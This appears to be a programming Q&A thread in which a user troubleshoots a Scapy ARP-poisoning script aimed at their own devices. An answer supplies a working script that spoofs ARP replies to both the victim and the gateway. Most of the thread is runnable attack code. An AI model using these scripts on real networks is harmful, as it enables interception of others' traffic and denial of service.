# Arp Spoofing/Poisoning not working/stopped working

Tags: python, scapy, arp

I've lately been trying to build a "Man in The Middle" using Python and Scapy (for my own practice, no malicious purposes).
I started off with writing code to create a dos, however for some reason it's acting strangely.
First of all, for some reason, when I run it on my Windows PC, the arp entry never changes. I've even gone as far as clearing the arp table (arp -d *), yet still the real mac address of the gateway returns.
Secondly, the code seems to work on my phone only partially - when opening websites, it just takes a long while. Also some websites seem unaffected (Instagram works...).
Also, running the code against different brands of phones resulted in different results.

Could it be that there are security measures on the different devices? Did I do something wrong?
Here is the code, thanks for the help!

```
from enum import Enum

import getmac
import netifaces
from scapy.all import ARP, Ether, sendp


class DeviceIps(Enum):
    MyPhone = '192.168.1.27'
    MyPc = '192.168.1.70'


class Device(object):
    def __init__(self, ip: str):
        self.ip = ip


def get_mac_from_ip(ip=None):
    return getmac.get_mac_address(ip=ip)


def build_poison_packet(victim_ip):
    ARP_RESPONSE_CODE = 0x2
    FAKE_MAC_ADDRESS = 'aa:bb:cc:dd:ee:ff'

    gateway_ip_address = netifaces.gateways()['default'][netifaces.AF_INET][0]
    victim_mac_address = get_mac_from_ip(victim_ip)
    poison_packet = Ether(src=FAKE_MAC_ADDRESS, dst=victim_mac_address) \
                    / ARP(psrc=gateway_ip_address,  # -> Address to lie about
                          hwsrc=FAKE_MAC_ADDRESS,  # -> Mac address to direct to
                          hwdst=victim_mac_address, pdst=victim_ip, op=ARP_RESPONSE_CODE)
    return poison_packet


def poison(target: Device):
    poison_packet = build_poison_packet(target.ip)
    print(poison_packet.show())
    while True:
        sendp(poison_packet)


def main():
    poison(Device(DeviceIps.MyPc.value))

main()
```

Answer (score 0):

Here's simple scapy code that send arp reply to victim and host (gateway) address.
You can clean up the both victim and host arp table before your script is terminated.

```
#!/bin/env python

from scapy.all import Ether, ARP, sendp
import time

victim_hw_addr = "34:e1:2d:83:20:aa"
victim_ip_addr = "192.168.43.152"
gw_hw_addr = "ce:9f:7a:7b:d7:aa"
gw_ip_addr = "192.168.43.1"
my_hw_addr = "8c:85:90:c3:0b:aa"
tmout = 100

arp4victim = Ether(dst=victim_hw_addr, src=my_hw_addr) / ARP(pdst=victim_ip_addr, hwdst=victim_hw_addr, psrc=gw_ip_addr, hwsrc=my_hw_addr, op=2)
arp4gw = Ether(dst=gw_hw_addr, src=my_hw_addr) / ARP(pdst=gw_ip_addr, hwdst=gw_hw_addr, psrc=victim_ip_addr, hwsrc=my_hw_addr, op=2)

while True:
    sendp(arp4victim)
    sendp(arp4gw)
    time.sleep(3)
    print "*"
```